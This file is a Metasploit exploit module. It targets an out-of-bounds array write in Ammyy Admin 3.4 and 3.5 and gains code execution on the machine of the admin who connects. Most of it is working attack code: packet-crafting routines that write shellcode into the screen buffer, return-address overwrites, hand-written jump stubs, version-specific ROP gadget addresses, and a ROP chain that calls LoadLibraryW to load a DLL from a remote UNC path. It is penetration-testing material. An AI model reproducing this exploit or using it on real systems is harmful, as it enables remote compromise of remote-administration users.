# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Ammyy Admin Array Index Out-Of-Bounds',
'Description' => %q{
This exploit gains code execution on the controller side of Ammyy Admin from the controlled
side. To do this, it exploits an array index out-of-bounds write. The exploit uses the
relative OOB write to overwrite a return address on the thread stack, which is generally
mapped directly below the Ammyy image data, and retrying on the next thread stack in case
that was not the correct thread.
There are two targets, one for immediate, direct shellcode execution taking advantage of
the fact that Ammyy does not opt-in to DEP, and the second, using a ROP-only exploit to
call LoadLibraryW with a remote UNC path.
Since Ammyy Admin uses a crypto library that would be very time-consuming to reproduce and
multiple methods of setting up a connection (relay, direct, etc.) this exploit was written
to simply hook Ammyy Admin from an injected DLL, using its own code to handle the crypto and
connections, substituting the exploit for any data sent to the server. This module will
generate a file (exploit.dat) you must copy, along with aaexploit.exe, to a Windows VM. Run
aaexploit.exe, and wait for a connection. When you hit "accept" on the connection, the
exploit will be sent.
This module has been tested successfully against Ammyy Admin 3.4 on Windows Vista 32-bit
and Windows 7 32 and 64-bit for direct (IP) connections only.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt "scriptjunkie" Weeks <scriptjunkie[at]scriptjunkie.us>'
],
'References' =>
[
[ 'CVE', '2014-XXXX' ],
[ 'OSVDB', 'XXXX' ],
],
'Payload' =>
{
'Space' => 800,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Ammyy Admin 3.4 Direct',
{
'Type' => 'direct',
'Version' => '3.4'
}
],
[ 'Ammyy Admin 3.4 Always-On DEP',
{
'Type' => 'rop',
'Version' => '3.4'
}
],
[ 'Ammyy Admin 3.5 Direct',
{
'Type' => 'direct',
'Version' => '3.5'
}
],
[ 'Ammyy Admin 3.5 Always-On DEP',
{
'Type' => 'rop',
'Version' => '3.5'
}
]
],
'Privileged' => true,
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
OptString.new('DLL_PATH', [ false, 'The DLL path to load for the DEP Always-On target.',
'\\\\1.2.3.4\\file.dll']),
OptString.new('FILENAME', [ true, 'The file name.', 'exploit.dat']),
], self.class)
end
# Takes a string of binary data, and generates a stroke set in the Ammyy protocol which will
# write that data to the specified col/row point on the remote side, skipping a given pixel if
# specified to avoid overwriting a particular local variable at the wrong time
def strokeSet(col, row, data, skip)
#minus one because the number of strokes is the number of pixels - 1
numpixels = (data.length + 3) / 4
numpixels -= 1 if skip != -1 # subtract again if you have a skip
#03 XoffsetWord YoffsetWord DrawWidthWord DrawHeightWord
output = "\x03" + [col, row, numpixels, 1].pack('vvvv')
output << "XXXX" # end of packet signal to injector
offset = -1
#zero pad to 4 byte boundary; any extra is discarded in unpack("V*")
(data + "\x00\x00\x00").unpack('V*').each do |pixel|
offset += 1
next if skip == offset # don't write this pixel if we're avoiding overwriting a var
# Get pixel values from this 4-byte chunk
r, g, b, a = [pixel].pack("V").unpack("C*")
# sanity check pixel value
print_error("Shellcode at pixel #{offset} invalid; has trailing 0") if a != 0
# We send pixels in 16 x 1 sections; each of which has its own header (0x1A)
if offset % 0x10 == 0
# Chunk header; includes flags (0x1A), background color we use to set 1st pixel values,
# and number of strokes (pixels) remaining to send in this chunk
numstrokes = [0xF, numpixels - offset - 1].min
output << [0x1A, r, g, b, numstrokes].pack("C*")
else
# This is a stroke. A stroke can be multiple pixels wide or high, but we're just using
# them to write a single pixel each. Data format looks like this:
# R G B [low nibble Y offset, high nibble X offset]
# [low nibble stroke height; high nibble stroke width]
# since we're only using 1x1 strokes, we only set the X offset part of this
output << [r, g, b, (offset % 0x10) << 4, 0].pack("C*")
end
end
output << "XXXX"
output
end
def exploit
# Injected dll divides packets to send by "XXXX"
# First we specify header data and global flags for the connection.
sploit = "XXXX=XXXX"
sploit << "\x7E\xCC\xF5\xED\xB7\x16\x92\xE2\x96\xBD\xF3\xFF\xC0\xFF\x2D\x97\x69\xF2\xCA\x99"
sploit << "XXXX"
sploit << "\x00\x7F\x00\x00\x00"
sploit << "XXXX"
# send bogus system info
sploit << "\x3A\x00Windows\x006.0.6001 SP1.0\x00U_R_PWNED\x0AJan 01 2014 at 01:23:45\x00\x05"
sploit << "XXXX"
sploit << "\x15"
sploit << "XXXX"
# screen dimensions and stuff
sploit << "\x70\x03\x03\x65\x18\x00\xff\x00\xff\x00\xff\x00\x10\x08\x00\x20\x00\xff\x00\xff\x00"
sploit << "\xff\x00\x10\x08\x00\x20\x03\x58\x02"
sploit << "XXXX"
if target['Version'] == '3.4'
offsets = {
'push_esp_ret' => 0x004424a2,
'pop_ebp_ret' => 0x004488bf,
'loadlibW' => 0x0044C7B3,
'pop_edi_ret' => 0x0045aba9,
'pop_esi_ret' => 0x00460029,
'pushad_ret' => 0x0045ed48,
'ret' => 0x00430315
}
else
offsets = {
'push_esp_ret' => 0x004786cf,
'pop_ebp_ret' => 0x00418086,
'loadlibW' => 0x0044F079,
'pop_edi_ret' => 0x00471639,
'pop_esi_ret' => 0x0046003e,
'pushad_ret' => 0x004615e8,
'ret' => 0x004012C0
}
end
if target['Type'] == 'direct'
# shellcode must be in unicode format
first_payload = payload.encoded
encoder = framework.encoders.create("x86/unicode_mixed")
encoder.datastore.import_options_from_hash( {'BufferRegister'=> 'ESP' })
unicode_payload = encoder.encode(first_payload, nil, nil, platform)
scode = unicode_payload.unpack("C*").pack("v*")
# actually not, but every 4th byte must be a 0 since we can only write the R G B parts of
# the pixel, and the pixels are stored as R G B A, which ends up being R G B 0, but we
# don't have a generic "every 4th byte must be null" encoder, so we just use the Unicode
# one, which works just fine.
# First stroke set will write the shellcode at the beginning of the screen buffer
sploit << strokeSet(0, 599, scode, -1)
# Second write will be an OOB write that will overwrite the return address
# Then calculate address of shellcode and jump to the shellcode
# This will work most of the time
stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe
0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var
stack << "\xB8\x3C\x01\x00\x00" + # mov eax, 0x13C
"\xEB\x01" + # jmp next
"\x00" + # has to be null
"\x01\xC4" + # next: add esp, eax
"\xEB\x00" + # jmp over mandatory null
"\xFF\xE4" # jmp esp
# Return address is at 0325FEBC, when pixel data starts at 03360000. That's a 0x144 or 324
# byte OOB overwrite from start of image, which is 81 pixels. So, with an 800x600 screen,
# we use a stroke set with X offset 719 and Y offset 600 (rows go down in address)
sploit << strokeSet(719, 600, stack, 1)
# Third write will be second trigger, and may work if that fails
# it's pretty much the same thing except add another megabyte (default stack size) to esp
stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe
0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var
stack << "\x81\xC4\x3C\x00\x01\x00" # add esp,0x1003c
"\xEB\x00" # jmp over mandatory null
"\xB8\x00\x01\x00\x00" # mov eax,0x100
"\xEB\x01" + # jmp next
"\x00" + # has to be null
"\x01\xC4" + # next: add esp, eax
"\xEB\x00" + # jmp over mandatory null
"\xFF\xE4" # jmp esp
# executing stack is 0x100000 below since default stack size is 1MB (0x100000 bytes); e.g.
# at 0347FEBC when image starts at 03580000. That's 0x40051 (or 262225) pixels back, which
# is 327 rows and then 625 pixels. So our X offset is 175 (AF) and Y offset is 927
sploit << strokeSet(175, 927, stack, 1)
elsif target['Type'] == 'rop'
# ROP target is all-in-one write that will overwrite the return address on the stack
# and end up calling LoadLibraryW with a UNC path
stack = [offsets['pop_ebp_ret'], # POP EBP # RETN [AA_v3.exe]
0x00000000, # not used since ret 4; must be skipped due to local var
offsets['loadlibW'], # address of call LoadLibraryW
offsets['pop_edi_ret'], # POP EDI # RETN [AA_v3.exe]
offsets['ret'], # RETN
offsets['pop_esi_ret'], # POP ESI # RETN
offsets['ret'], # RETN
offsets['pushad_ret'], # PUSHAD # RETN jumps to edi, with esi, ebp, orig esp... above
].pack("V*")
stack << datastore['DLL_PATH'].unpack("C*").pack("v*")
# same offset logic as above
sploit << strokeSet(719, 600, stack, 1)
# second try, same logic as above
sploit << strokeSet(175, 927, stack, 1)
end
print_status("Creating '#{datastore['FILENAME']}' file ...")
print_status("Now copy that, along with aaexploit.exe, to a Windows VM.")
print_status("Then run aaexploit.exe, and wait for a connection.")
print_status("Hit accept on a connection request to send the exploit.")
file_create(sploit)
end
end